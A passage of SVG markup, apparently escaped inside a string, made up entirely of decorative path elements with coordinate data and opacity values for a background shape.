d=\"M1610.26,74.9c-3-2.13-6.32-3.74-9.72-5.7-1.09,2.47-1.5,4.62-4.13,3-.25-.15-1.88,1.28-2.25,2.23-.27.7.45,1.8.76,2.82l-3.83.53a15.57,15.57,0,0,1-.45-3.63c.42-3.24-2.32-3.61-4.14-4.18-2.08-.66-4.46-.36-6.71-.47-4.33.72-1.18,5.15-3.41,8.37l-3-5.61c-5.69-1.77-11.75,2.1-17-2a.46.46,0,0,0-.33-.07c-3.42.13-6.84.22-10.25.46a7.76,7.76,0,0,0-2.34,1,76.7,76.7,0,0,0,11,.88c3.11,0,6.07,3.85,9.82,1.13,4.48,2.21,9.91,2.83,12.88,7.72,2.49-.31,4.22-1.21,4.2-4.18,0-.68,1.05-2,1.44-1.94a3.9,3.9,0,0,1,2.48,1.54c.49.79,0,2.29.57,2.91a21.57,21.57,0,0,0,3.84,2.76c.55-2,1.63-2.65,3.75-2,1,.3,2.26-.22,3.4-.36l.61-.79c.34-1,.42-2.56,1.06-2.83,2.55-1.06,5.31-2.4,7.91-2.24,1.38.09,2.58,3,3.87,4.69l.85.6,4.24-4.74-.08,0-.07-.06C1613.61,75.42,1612.25,76.32,1610.26,74.9Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1672.05,77.23c-7.14,2.24-12.93-.67-18.27-5.13-2,1.79-4.39,3.18-5.58.06s-3.12-3.37-5.78-3.25a10.49,10.49,0,0,1-3.93-.59c-4.74-1.76-11.18.87-13.09,5.71a36,36,0,0,1-3.67-1.4c-3.2-1.64-4.49-1.26-6.49,2.07l.07.06.08,0c3.23.21,6.47.29,9.67.68,1,.13,2,1.08,3,1.65,2.17-.16,4-.47,3.94-3.46,0-1,1.46-2.37,2.55-2.75.7-.25,2,.95,2.9,1.6.54.37.87,1.24,1.42,1.38,5,1.3,10.1,2.46,15.14,3.74,2.52.64,5,1.52,7.51,2.18,1.6.42,3.25.65,4.88,1l1.9-1,4-1.18,1.11-.79a2.61,2.61,0,0,0-.08-.55Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1418.08,75.15l-2,1.17A2.8,2.8,0,0,1,1411.7,74c-.08-2.55-1.19-2.8-3.27-2-1.73.62-3.53,1-5.69,1.6-.74,2-1.7,4.51-2.34,6.2-2.42,0-5.09-.22-5.19.16a12.83,12.83,0,0,1-1.06,3c2.55.09,4.55-2.42,7.06-1.16.26-.38.5-.77.75-1.18.9-1.51,2.64-3.34,4.15-3.49a16.85,16.85,0,0,1,7.51,1.39c.92.37,1.21,2.37,2.16,4.46,1-3.19.65-6.75,4.61-6.79-.18-.64-.36-1.28-.59-2.08Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1521.68,67.32a3.24,3.24,0,0,0-2.29.3c-3.15,2.53-6.32,1.19-9.62.47-1.15-.26-2.56.65-3.85,1,3.86.44,7.7,1.08,11.57,1.25,4.37.19,8.78-.25,13.15,0,3.83.2,7.63.94,11.44,1.44a11.89,11.89,0,0,0-2.91-1.47C1533.35,69.22,1527.52,68.26,1521.68,67.32Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1432.47,69.35c-2.84-.79-6.83,2.34-7.59,5.52l9.91-2.57C1434,71.27,1433.44,69.62,1432.47,69.35Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1494.72,69.78c1.49-.63,3.52.08,5.31.07a7.58,7.58,0,0,0,1.93-.52L1491.9,68C1492.27,69.4,1492.31,70.81,1494.72,69.78Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1823.13,91.5c2.2,1.79,4.19,4,6.66,5.22,1.69.84,4.32,1.3,5.58-1.44-3-1.35-5.89-2.82-8.94-4C1825.5,90.94,1824.24,91.41,1823.13,91.5Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1803.27,96.36l-3.54-.31C1800.73,98.26,1801.87,98.73,1803.27,96.36Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1899.21,117.79l.45.23-.06-.38Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1899.32,115.94l-1,1.4.9.45.39-.15C1899.5,117.07,1899.41,116.5,1899.32,115.94Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M829.91,17.17c3.32,1.48,6.16,4,8.5,5.66.69,2.1.83,4,1.82,5,.54.56,2.52-.25,3.85-.44L844,26.26l-3.13-1.57,1.68-4.79.52.89,5.46-.74c2.14,1.1,3.93,2,5.74,2.95,1.08.55,2.9.83,3.16,1.63,1.61,4.89,4.53,2.43,7.35,1.72a17.15,17.15,0,0,1,4.64,0c.77,0,1.59.45,2.3.29,3.48-.78,6.07.56,8.42,3s3.3,2.39,5.56-.86h0l0,0h0c-1.9-.49-4-.6-5.64-1.55-2.79-1.6-5.49-3-8.83-2.53a1.37,1.37,0,0,1-.67,0c-2.43-.85-4.8-2.09-7.29-2.46-2.32-.35-4.77.22-7.41.4.25-1.64.44-2.83.62-4l-5.58-2.33-1.28-.27c-1.13.42-2.29,1.24-3.4,1.17-2.26-.13-4.56-1.22-6.33,1.25a3.36,3.36,0,0,1-2-1,4.6,4.6,0,0,0-4.76-2.91c-2.65,0-5.3-.43-8-.67L823,12.54l-4,0-1.36,1.23a11.41,11.41,0,0,0,2.6,1.37C823.45,15.84,827,15.86,829.91,17.17Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M628.92,64.11a4,4,0,0,0,2.57-1.64c1.61-3.27,4-2.52,6.27-1.29,3.89,2.08,8,1.82,10.88-.64l6.54.81c.05.43.13,1.18.18,1.61,6.45-2.75,14.07-1.15,19.28-6.26,4,3.24,3.87,3.16,7.22-.54a4.35,4.35,0,0,1,3.43-.95c3.6.59,6.43-.35,8.67-3.28s3-2.8,5.56,0l2.38-2.67a13.59,13.59,0,0,0-3.13-1.19c-3.33-.42-3.45-2.07-2.27-4.71.34-.74-.37-1.91-.45-2.9s0-2.27,0-3.41c1.2,0,2.64-.41,3.55.12a30,30,0,0,1,4.4,3.71c-.4-.91-1.31-2-1.11-2.71.86-3.1-.42-3.09-2.93-2.79-1,.12-2.25-1.43-3.39-2.22a14.65,14.65,0,0,1,2.5-1.72c1.06-.45,2.31-.45,3.37-.89.76-.32,2-1.2,1.91-1.55a22.79,22.79,0,0,0-1.6-3.82L699,26c.5-1,.78-2.26,1.56-2.94a29.86,29.86,0,0,1,4.4-2.71c.47,1,1,1.58,1,2.15-.08,2.06.56,4.18,2.67,3.75,1.19-.24,2-2.77,2.79-4.36.27-.53-.11-1.35,0-2,.18-1.56.46-3.11.7-4.66l.94-.57c2.37,4.62,5.35,3.84,8.33,1.56,1.77-1.36,3.91-2.68,4.86-4.55,1.87-3.63,2.13-4,6.66-2.81l-1.71,4.17c2.19,0,3.65.07,5.11,0,2-.12,4.31,1,5.73-1.59.21-.39,2-.5,2.47-.08,2.2,1.88,4.7.78,7,1.14a74.34,74.34,0,0,1,7.66,2,7.56,7.56,0,0,0,1.82.32c1.35,0,2.9-.49,4,0,2.42,1,4.58,2.68,6.93,3.9a14.93,14.93,0,0,0,3.31.88c0-1.07-.14-2.14-.07-3.19s.2-3.15.54-3.2a34.09,34.09,0,0,1,7.62-.28c.21,0,.26,2.7.33,4.15a13.6,13.6,0,0,0,0,2.71c.31,1.18.71,3,1.46,3.27,1.8.53,4,2.17,6-.42-.76-.89-1.8-1.63-2.08-2.59a4.11,4.11,0,0,1,.35-3.22,75.25,75.25,0,0,1,5.12-5.76l-4.23-.85h-1.75a23.59,23.59,0,0,1-4.87.23c-4.93-.78-9.8-1.94-14.74-2.64A7.7,7.7,0,0,0,764.73,9a12.36,12.36,0,0,1-11.05.46c-.51-.21-1.33-.55-1.59-.33-3.85,3.18-5.5-2.22-8.51-2.15-.06,0-.12-.41-.18-.62l-1.29.11c-2.07,3.28-4.58,3-7.61-.72l-4,0-8.09,4c-1.32-.92-3.16-1.42-4.43,1.62-.64,1.52-2,1.41-2.69-.2A31.91,31.91,0,0,1,714.1,7l-4.7.72c-.26.87-.58,1.72-.79,2.59-.65,2.77-1.66,4.61-4.66,2a1.92,1.92,0,0,0-1.27-.45C694,12.55,686,9,677.53,7.84c-7.12-1-10.72,2.1-15.18,6.16l-.93-2.22c-2.34.47-4.46.84-6.55,1.35-1.41.35-2.76.91-4.14,1.36s-3,.95-4.43,1.4c-2.86.87-2.94,3.58-2.8,5.56.17,2.28,1.58,4.46,2.5,6.81,3.22-2.47,1.91-7.61,6.6-9-1.43,5.66-2.78,11-4.11,16.31h8.27l1.52-2L660.16,35a62.13,62.13,0,0,0,6.15-1,6.4,6.4,0,0,0,2.42-1.67c2.82-2.66,4.43-2.49,6.69.82.5.74.89,1.55,1.33,2.33l1.27,0c3.29-1.6,4.49.31,5,2.79,1.88.76,3.88,1,5,2.18a5.3,5.3,0,0,1,1.31,4.43,5.08,5.08,0,0,1-3.59,2.81,45.42,45.42,0,0,1-10.16,0,7.44,7.44,0,0,1-4.27-2.35c-2.85-3.18-3.63-3.18-5.73,1.12-.32-1.48-.56-2.59-1-4.78l-5.06,7.23c-8.42-4.81-7.21-4.6-12.22.4-1.86-2.11-4.43-4.06-6.74-2-1.57,1.36-6.06.63-5.15,4.57h7a17.25,17.25,0,0,1,.21,3.11,29.4,29.4,0,0,1-.88,3.44,13.22,13.22,0,0,1-3.1-1.4c-1.86-1.49-3.39-1.28-5.13.2a2.66,2.66,0,0,1-2.33.28c-.43-.18-.58-1.34-.58-2.07,0-2,.15-3.93.24-5.9l-1.5-.44-4.38,5.54c.44,2.07.87,4.15,1.3,6.21-5.57,1.5-5.57,1.5-5.65,3.89,1.33-.18,2.63-.43,3.94-.51A35.87,35.87,0,0,0,628.92,64.11Zm31-43c-.86-.22-1.49-1.36-2.23-2.1.66-.59,1.27-1.59,2-1.67s1.46.81,2.2,1.27c.2.44.4.87.59,1.31C661.61,20.33,660.63,21.25,659.92,21.08Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M985,55.33c1.46-2.15,3-1.15,4.76-.44,5.9,2.42,12,3.57,18.34,2.29.65-.12,2,.4,2.1.83.72,3.42,3.4,3.9,6.1,4.17,6.63.67,13.45,2.49,19-3.39.76-.81,2.85-.92,4.13-.58,4.64,1.21,9.25,2.57,13.75,4.2s7.75.24,9.1-4.07a10.62,10.62,0,0,1,.93-1.83c1.5,2.4,2.88,4.59,4.67,7.46,2-2.3,3.74-4.51,5.69-6.53.87-.9,2.23-2,3.22-1.92s2.08,1.55,2.91,2.57,1,2.73,1.83,3c3.21,1,6.57,1.61,9.87,2.35.5-1.36,1-2.72,1.44-3.87l-9.51-3.68c.26-2.06,1.18-4.23.5-5-1.34-1.55-3.45-2.5-5.7-.66-.7.57-2.06.26-3.1.48-1.46.31-3.25.32-4.28,1.19-2.55,2.15-5.08,1.41-8.44.93l6-4.6-.54-1c-2.62.6-5.77-1.68-7.81,2.27a75.78,75.78,0,0,1-4.52,7l-5-4.48c-3.75.55-7.67.15-11.14,2.29-.61.38-1.7,0-2.58,0-2.43-.07-5.53-1.09-7.16,0-2.81,1.92-5,3.09-8.39,1.6-1.68-.74-3.94-.25-5.58-1-5.87-2.85-11.71-3.89-17.88-1.09-.41.18-1.15-.31-1.71-.55s-1.53-1.05-1.94-.85c-4.21,2.08-8.5-2.77-12.67.18-.17.13-.9-.23-1.14-.54-1.95-2.59-3.37-1.33-4.72.6,2.66,1.1,5.3,2.25,8,3.27A1.59,1.59,0,0,0,985,55.33Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M409.63,67.73c2.4.08,4.82-.07,7.23-.13a2.58,2.58,0,0,1,1.94-.47,8.4,8.4,0,0,0,1.4.43,4.27,4.27,0,0,1,1.22.21c3.68.44,7.7-.46,10.67,2.75.18.2.62.21,1,.25l17.24,2.13v3.48l11.92-2c5.85-1,10,3.53,15.15,4.94,3.69,1,6.73,1.89,10-.58,1.47-1.11,2.59-3.55,5-1.2.17.17,1.73-.58,2.1-1.21a40.76,40.76,0,0,0,2.08-4.91l-3.05-1.14-2,1.35-.95.4-.4,1c-.4.62-1,1.83-1.18,1.77-3.22-1.15-7.18.12-9.79-3l-3.3-.12c-.48,2.5-2.2,2.1-3.94,1.71A45.91,45.91,0,0,0,467,72.33c-2.9-.35-6.4.42-8.61-1-4.34-2.7-8.77-1.22-13.12-1.78-3.89-.5-8-.54-11.59-1.87-5.92-2.19-11.91-1.64-17.91-1.77-2.64,0-5.27,1.05-7.93,1.07A2.23,2.23,0,0,0,409.63,67.73Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M528.33,60,532,62.45l1-.27,2.73-2.76,2,2.1a1.43,1.43,0,0,0,.16.57c2,2.19,1.8,4.12-.66,6.21a1.48,1.48,0,0,0-.19.57c0,.71.06,1.42.08,2.13.91,0,2.15.29,2.65-.18,2.74-2.53,4.64-1.92,6.27,1.18a2,2,0,0,0,1.64.63c.48-.5,1.07-1.51.86-2-1-2.06.52-5.25-2.83-6.36-.17,0,.1-3.21.62-3.36,5.07-1.48,8.48-7.13,14.61-5.91.16,0,.45-.66.68-1l-.74-1.36.07-.12-3.44-.5-8.15,0-4.79.53c-.91,2.39-1.8,4.34-5.06,2.42A10.91,10.91,0,0,0,534,54c-3.57.08-6.12,2.92-5.72,6Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M797.9,16.16c4.54,1.39,4.73,1.71,3.73,5.93,5.87,2.82,12.19.84,19.09,1.15L818.5,19c-2,1.22-3.54,2.9-4.49,2.61-2-.6-3.28-2.38-2.1-4.74l.71.53,3.64-3.57c-4-2.19-8.21-1.74-12.42-.6-1.08.29-2.19.49-3.28.74V9.76l-4,.62v.69C797,12.75,794.67,15.18,797.9,16.16Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M898.68,32.93A23.5,23.5,0,0,1,905,36.22c2.23,1.52,4.15,3.79,7.08,1.3a1.55,1.55,0,0,1,1.24-.28c3.11,1,6.21,2.07,9.67,3.24a6.75,6.75,0,0,1,8.71,1.39c1.94,2.4,6.73,2.33,9.15-.14a9.88,9.88,0,0,0-2.6-1.37c-8.16-1.43-15.42-6.32-23.95-6.26-2,.87-3.89,1.8-5.89,2.54-.32.12-1.27-.57-1.38-1a2.27,2.27,0,0,1,.64-1.7,19.13,19.13,0,0,1,2.13-1.87l-.15-.16-2.89-.56a48.5,48.5,0,0,0-5.84-2.1,17.66,17.66,0,0,0-4.35.07C896.65,30.87,896.43,32.29,898.68,32.93Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M600.59,62l2.14-1.93.07.87c2.81.33,5.62.75,8.44.87.42,0,1.19-1.39,1.28-2.2a10,10,0,0,0-.53-2.94c-.68-.56-1.32-1.17-2-1.67-3.19-2.25-6.4-4.47-9.6-6.71l-1.28,0c0,.3,0,.59,0,.89l3.51,2.9C598.91,57,598.36,59.78,600.59,62Z\" transform=\"translate(0 0)\"\n opacity=\"0.1\"></path>\n <path d=\"M793.24,26.65a4.59,4.59,0,0,0,3.1.52c2.12-.83,3.24-.36,3.73,1.81.19.88.13,1.95.62,2.58a5.36,5.36,0,0,0,2.64,1.81c.37.1,1.11-1.18,1.63-1.76-1.26-3.64-.74-7.86-5.65-8.65-.71-.12-1.29-1-2-1.17-1.14-.21-3.19-.42-3.36,0A12.07,12.07,0,0,0,793.24,26.65Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M945.42,45.14a7.4,7.4,0,0,1,2.3.36c4.19,1,8.38,2,12.55,3,1.46.37,3.3.56,4.23,1.54,2.66,2.8,5.85,2.55,9.14,2.33-3.18-1.55-6.24-3.5-9.58-4.56-4.33-1.36-8.92-1.9-13.34-3-2.63-.66-5.17-1.72-7.75-2.59C942.68,44.16,943.16,45.34,945.42,45.14Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M569.37,67.57c1.56,0,2.79.05,4,0,1.43-.07,2.86-.24,4.29-.36A24,24,0,0,0,574,64.28C570.65,62.58,569.09,63.81,569.37,67.57Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M705.23,41.47c.24,1,.49,2,.74,3,1.37.31,2.73.68,4.11.92a2.43,2.43,0,0,0,1.77-.14,2.19,2.19,0,0,0,.6-1.77C712.08,41.86,706.69,40.44,705.23,41.47Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M566.9,62.85l4.09-.37c0-.65,0-1.31.08-2l-3.93-.7Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M566.48,55.5c.88-.51,1.75-1,2.62-1.55,0-.33,0-.66,0-1l-2.67-.39h-.72l-1.25.23-.81,1.24C564,55.73,564.79,56.48,566.48,55.5Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M885.72,28.77c2.09-.33,4.87.74,5.44-2.68l-2.07-.77-3.41,3.4,0,0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M885.71,28.76l0,0h0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M885.71,28.76l0,0h0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M402,64.38a12,12,0,0,0-3.8-.12l3.72,1.19C401.88,65.09,401.91,64.73,402,64.38Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M533.65,70.75l.94,2.17,1.85-1.85-1.39-.76Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1092.16,55.67c.14-.05.18-.35.26-.54l-.57-.24c-.08.19-.27.42-.21.56A.55.55,0,0,0,1092.16,55.67Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M18.44,71.94A8.27,8.27,0,0,0,18,71c-3.4-.93-11.69-5.11-18-8v6.54C7.73,71.3,20,76,18.44,71.94Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M19.56,70.79a2.81,2.81,0,0,1,1.29-2.4c3.26-1.37,7-2,9.89-3.8,3.33-2.12,6-4.61,8.93.21.19.31,1.5-.08,2.3-.14a11.13,11.13,0,0,0-.78-2.49A13.83,13.83,0,0,0,39.1,60c2-.16,3.6.18,4.53-.44,3.66-2.47,7.56-2.39,11.66-1.88.84.11,1.77-.56,2.67-.87A66.19,66.19,0,0,0,49.7,56c-2.08,0-4.12,1.07-6.22,1.3C35,58.2,26.47,59,18,59.82L13.3,64.15l.6,1.25C15.24,67.29,17,69,18,71,19.1,71.33,19.69,71.3,19.56,70.79Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M66.23,56.25c2.09.74,3.41.14,4.79-1.32a8.11,8.11,0,0,1,2.36-1.45c1.93,2.9,4,.68,6,0,.73,4.47,3.79,5.76,8.55,3.67l-2.66-3.47c2.36-.27,4.3,0,5.56-.73,3.88-2.43,7.67-1.82,11.69-.68.89.25,2.06-.52,3.11-.82L94,49.77q-8.62,1.41-17.24,2.8a2,2,0,0,1-1-.2,5.37,5.37,0,0,0-6.17,1.43,3.11,3.11,0,0,1-2.58.66,7.68,7.68,0,0,0-7.71,2.11c1,0,2,0,3-.06C63.62,56.43,65.09,55.85,66.23,56.25Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M404.29,66.23l-2.42-.78c0,.48,0,1-.05,1.46a22.28,22.28,0,0,0,9,3c3.72.58,8.26.5,10.54,5,.64,1.26,2.67,1.7,3.61-.49l0,0c-2.22.08-4.06,0-2.63-3.16.4-.88.23-2.77-.39-3.2a2.09,2.09,0,0,0-.52-.25c-.41,0-.82-.12-1.22-.21-.64,0-1.32,0-1.94,0l-1.4,0-.37.27c-2.69,2.28-9.66,2-11.95-.66-.2-.22-.17-.64-.24-1a7.52,7.52,0,0,0,3.54.79,2.26,2.26,0,0,1-.21-2c.19-.78-1.11-1.93-1.73-2.91a2.57,2.57,0,0,0-.14-.61c-2.85-.2-3.59,1.14-3.81,2.86A3.89,3.89,0,0,1,404.29,66.23Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M421.42,67.77a4.27,4.27,0,0,0-1.22-.21C420.6,67.65,421,67.72,421.42,67.77Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M421.42,67.77a4.27,4.27,0,0,0-1.22-.21C420.6,67.65,421,67.72,421.42,67.77Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M404.54,67.21c2.29,2.64,9.26,2.94,11.95.66l.37-.27c-2.41.06-4.83.21-7.23.13a2.23,2.23,0,0,1-1.79-.7,7.52,7.52,0,0,1-3.54-.79C404.37,66.57,404.34,67,404.54,67.21Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M404.54,67.21c2.29,2.64,9.26,2.94,11.95.66l.37-.27c-2.41.06-4.83.21-7.23.13a2.23,2.23,0,0,1-1.79-.7,7.52,7.52,0,0,1-3.54-.79C404.37,66.57,404.34,67,404.54,67.21Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M404.29,66.23A3.89,3.89,0,0,0,402,64.38c0,.35-.07.71-.08,1.07Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M404.29,66.23A3.89,3.89,0,0,0,402,64.38c0,.35-.07.71-.08,1.07Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M398.39,72.46c1.45-.38,3-.49,4.64-.75l-1.86-3.45c-3,3.64-5.33,3.67-8.89.42a22.56,22.56,0,0,0-4.12-2.4C389,69.59,395.25,73.29,398.39,72.46Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1899.43,110.37a4.84,4.84,0,0,0-2.63,1.43,7.83,7.83,0,0,0,2.63-1.11Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1788.06,100.5c1.9-.27,3.93.29,5.9.52,3.39.4,6.78.86,10.17,1.23.38,0,.79-.49,1.21-.52a11.9,11.9,0,0,1,3.42,0,24,24,0,0,1,3.82,1.48c.32-.46.74-.79.8-1.17.32-2.1,1.85-2.36,3.2-1.6.59.33.8,2.25.44,3.13-.76,1.86-2.44,3.59-.39,5.47,2.55,2.34,10.5,1.49,13.12-1a5,5,0,0,1,3.69-1.39c6,1,6,1.16,8.38-4.58.12-.27.43-.45,1.08-1.11,1.41,2.23,2.65,4.31,4,6.3,1.77,2.59,2.83,2.52,4.39-.13.7-1.19,1.53-2.29,2.31-3.43l1.12.12,1.85,8.84c1.67-.23,3.16-.81,4.47-.54,2.45.51,4.64,1.26,6.68-1.11.52-.61,2.25-.65,3.22-.32,7.35,2.44,15.29,3.58,21.22,9.29a6.59,6.59,0,0,0,1.53.83c2.11-1,3.77-2.24,5.51-3l-.9-.45,1-1.4,0,0c1.17-.83,2.34-1.66,3.5-2.51.49-.36.94-.79,1.41-1.18-.47-.52-.84-1.34-1.41-1.51a7.28,7.28,0,0,0-3.42-.33v.32a7.83,7.83,0,0,1-2.63,1.11,8,8,0,0,0-1.56,2.31c0-.69-.07-1.38-.08-2.07-5,.32-10.51-2.38-14.93.57,4.42-3,10-.25,14.93-.57a21,21,0,0,0-.41-4.29,38.5,38.5,0,0,0-2.41-5.92l-.92,1.3a51.21,51.21,0,0,0-5.5-.55,2.76,2.76,0,0,0-2.16,1.12c-.33.66,0,1.7.15,2.56.22,1.54.48,3.07.72,4.6-2-.32-4-.6-6-1-.6-.12-1.12-.83-1.68-.85a8.2,8.2,0,0,1-7.45-5,8.36,8.36,0,0,0-1.19-1.93c-4.34.38-7.91.8-11.48.92-.8,0-1.6-1-2.45-1.55-2.23-1.3-4.53-2.48-6.7-3.87a11.48,11.48,0,0,1-2.06-2.26l-1.31.09-7.11,3.44c.51-1.71,1-3.16,1.39-4.61l-3.23,1c-1.26,2.74-3.89,2.28-5.58,1.44-2.47-1.24-4.46-3.43-6.66-5.22l-2.63.37c-.42.3-.85.59-1.28.88L1815,92l-1.3.24-3.86,2.42c-1.06,2.07-2.71,2.13-4.61,1.34l-2,.34c-1.4,2.37-2.54,1.9-3.54-.31l-4.15-5.71-.76-.53-1.31.27-1.31.91c-2.15,1.16-4.26,2.4-6.47,3.43-1.68.78-3.49,1.3-5.23,1.93C1782,99.51,1784.34,101,1788.06,100.5Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1705.46,85.81a4.38,4.38,0,0,1,2.31,1.83c.48.62.57,1.54,1.16,3.35l3.73-5.94c.35,2.51.61,4.36.86,6.22l.77.24c1-1.51,2-3,3.23-4.79,2.69,1.59,6.16,2.57,7.75,4.86,1.93,2.75,3.55,3.7,6.59,2.4,1.4,2.3,2.34,5.58,5.88,2.53.35-.3,1.47.34,2.24.5a8.85,8.85,0,0,0,8.53-3.59l-4-3.33-3,3h0c-.52,1.87-1.45,2.1-2.77.67l-.67-.18c-1-.54-2.47-.86-2.81-1.66-2.73-6.37-7.81-7.43-13.86-6.49-2.44.37-4.15,0-3.55-3.09a.36.36,0,0,0-.25-.27c-4-.29-7.86,2.62-12,.33-.9-.5-2.86,0-3.82.74-2.33,1.78-4.2,1.33-6.39-.17-.93-.65-2.32-.65-3.5-1-.5,1.42-1,2.84-1.79,5.11,3.6-.5,6.59-1,9.59-1.3A24.79,24.79,0,0,1,1705.46,85.81Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1616.21,78.62c2-2.87,4.61-3.18,6.76-.66,2.6,3.06,2.77,3,5.06-.82-1-.57-1.93-1.52-3-1.65-3.2-.39-6.44-.47-9.67-.68l-4.24,4.74C1613.32,81.87,1614.91,80.48,1616.21,78.62Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1609,78.85c.28.23.86.08,1.31.1-1.29-1.66-2.49-4.6-3.87-4.69-2.6-.16-5.36,1.18-7.91,2.24-.64.27-.72,1.85-1.06,2.83.69-.37,1.39-.7,2.06-1.09C1604,75.56,1605,75.63,1609,78.85Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1689.47,82.26c-2.45-1.14-4.89-2.32-7.36-3.4-.47-.2-1.11,0-1.65,0-2.38-.31-4.75-.66-7.12-1l-1.11.79,16.92,3.72C1689.25,82.37,1689.36,82.29,1689.47,82.26Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1779.28,96.53c-3-3.4-6-1.4-9,0C1772.54,98.87,1776.37,98.87,1779.28,96.53Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1594.13,82.33c1.61,0,3.09.11,2.72-2.21-1.14.14-2.4.66-3.4.36-2.12-.65-3.2,0-3.75,2C1591.18,82.43,1592.66,82.29,1594.13,82.33Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M533.93,38.55c1.78-.33,3.59-.56,5.33-1a4.91,4.91,0,0,0,2.4-1.38c2.58-3,3.41-3,5.28.44.31.57.66,1.12.52.89,5.77.28,10.93.33,16,.85,2.32.23,4.13.6,5.24-2.09a9.67,9.67,0,0,1,2.74-3.41c.48-.4,1.62,0,2.46,0,.06-1.14.11-2.28.22-4.4l-3.47,2.63c-.13-1.71-.22-3-.31-4.21l-2-2.13c-3.21.4-2.52,3-2.58,4.94-.06,2.22.13,4.84-2.28,5.46-3.08.79-6.62,1.46-9.56.67-3.29-.87-3.59-6.11-1.09-8.56.6-.59.84-1.54,1.41-2.19a3.94,3.94,0,0,1,2.84-1.43,49.65,49.65,0,0,0-1.49,6.3c-.08.67,1.28,2.2,1.62,2.1a4.61,4.61,0,0,0,2.82-1.94c.4-1-.58-2.52-.25-3.59.66-2.06,1.31-4.72,2.88-5.74,2.42-1.58,5.72-1.73,8.43-3,3.87-1.76,7.72-.72,11.6-.57h0c-.16-2.46,1.55-2.79,3.33-2.69,3,.16,6,.52,9,.8L607.9,11l2.8-1.25,1.3,0,0-1.26c-3.16.74-6.38,1.27-9.45,2.28-4.88,1.61-9.67,3.15-14.91,1.84a7,7,0,0,0-3.33.25c-8.14,2.16-16.26,4.42-24.41,6.56-3.71,1-7.51,1.62-11.2,2.67-2.72.77-5.24,2.36-8,2.84-3.36.58-4.53,2.07-4.5,5.41,0,1.23-1.49,3.42-2.49,3.54-2.88.32-3.1,2-3.37,4l3.69,1.58Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path 